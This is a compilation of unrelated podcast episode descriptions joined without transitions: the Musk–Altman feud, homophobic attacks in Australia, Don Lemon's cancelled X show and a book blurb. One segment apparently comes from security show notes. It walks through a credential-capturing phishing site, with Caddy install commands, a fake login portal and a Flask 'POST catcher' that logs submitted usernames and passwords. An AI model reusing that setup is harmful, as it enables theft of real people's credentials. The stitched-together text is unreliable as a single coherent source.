The simmering feud between Elon Musk and Sam Altman is boiling again. In the latest round, OpenAI, which is being sued by Musk, uncorked a long post last week that included emails purporting to show that Musk didn’t really care about the safety of artificial intelligence (as he has long said he does). According to OpenAI, Musk just wanted to control the company. Also on the docket for Elon, Inc. this week: a conversation with Bloomberg reporter Loren Grush, along with regulars Dana Hull and Max Chafkin, about what Donald Trump’s designated head of NASA, billionaire Jared Isaacman, means for Musk. (Probably only good things.) Another story that is discussed is Hull’s deep dive into Musk’s funding of a preschool project. It’s part of a larger push from Musk to implement his own far-right agenda into education, and the money runs through at least two of his non-profit entities. There is a familiar cast of characters involved (like longtime money manager Jared Birchall) and some vague goals. See omnystudio.com/listener for privacy information.
Australia is experiencing a new form of homophobic violence where the perpetrators use social media to post and boast about their crimes. Police in multiple states are investigating cases where teenagers have used hookup apps to lure their victims before bashing them and filming the assaults, which are then uploaded to social media sites. There has also been an increase in street attacks where teenage offenders have assaulted LGBTIQ+ victims.

On a recent weekday, well-known commentator Don Lemon revealed a surprising turn of events about his anticipated show on media platform X. The news flash? Tycoon Elon Musk, at the helm of the venture, had dissolved the deal with Lemon scarcely hours after a spirited exchange during one of their interviews. The platform X's collaboration with Lemon originated in the commencement of this year. This was spurred on by the significant stride made by Tucker Carlson, a familiar face from Fox News, who had managed to captivate a large audience on the X platform within a short period. The discontinuation of the partnership was relayed after a heated first-episode interview with Musk. 'Post the impactful discussions I had with Elon Musk, he chose to terminate the bond we had with X,' Lemon put up on X. 'He shared this extraction in the aftermath of a comprehensive dialogue I had with him.' Despite this abrupt ending, the interview featuring the confrontationally stimulating conversation will make its anticipated debut on March 18, regardless of the fact that the partnership has been untimely terminated. Reflecting on his interview with Musk, Lemon stated that he assumed that they had a constructive discourse, but it seems his perspective was not shared by Musk. The stint at CNN did offer Lemon a strong backbone in navigating such challenging dialogues.See omnystudio.com/listener for privacy information.

Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu: sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list sudo apt update sudo apt install caddy -y Create an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet, just put the domain name in the Caddyfile: domain.com Then type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make a index.html with a basic phishing portal: Your rad awesome eyeball cool phishing portal! body { background-image: url("https://tangent.town/static/background.jpg"); background-repeat:no-repeat; background-size:cover; } User Name: Password: Unauthorized use is prohibited! This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher: from flask import Flask, request app = Flask(__name__) @app.route('/capture', methods=['POST']) def capture(): print(request.form) return 'OK', 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=5000) If you don't have Flask installed, do this: sudo apt install python3-pip -y sudo pip install Flask Run this file in one session, then in your index.html file make a small tweak in the form action directive: Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!
Part memoir, part cultural critique, In Our Shoes: On Being a Young Black Woman in Not-So 'Post-Racial' America (Plume Books, 2023) uses pop culture and author Brianna Holt's own lived experience to dissect the stereotypes and preconceived notions that young Black women must overcome in America today. In this fresh exploration of cultural appropriation, wokeness, tone policing, and more, Holt carefully dismantles myths about Black womanhood, allowing readers to assess their biases while examining the roles Black millennial women are forced to take on simply to survive. Through nine thoughtful chapters—such as “Leave the Box Braids for the Black Girls” and “Why Are You So Dark?”—laced with searing commentary, personal anecdotes from Brianna's own life, and interviews conducted with “everyday” Black women, In Our Shoes reveals the complexities of existence for Black women and creates a thought-provoking book that helps readers to learn, empathize, reflect, and, most importantly, act. A history, a work of criticism, a piece of reporting, and a call to action, In Our Shoes is a timely exploration of race and womanhood that will entertain, inspire, and inform in equal measures. Brianna Holt is an author, screenwriter, and reporter living in New York City. Holt's writing has been published in The New York Times, The Guardian, Rolling Stone, GQ, The Cut, The Atlantic, Complex, and more, including her own column, Active Voice, through Medium's GEN. In Our Shoes is her first book. Reighan Gillam is an Associate Professor in the Department of Latin American, Latino, and Caribbean Studies at Dartmouth College.
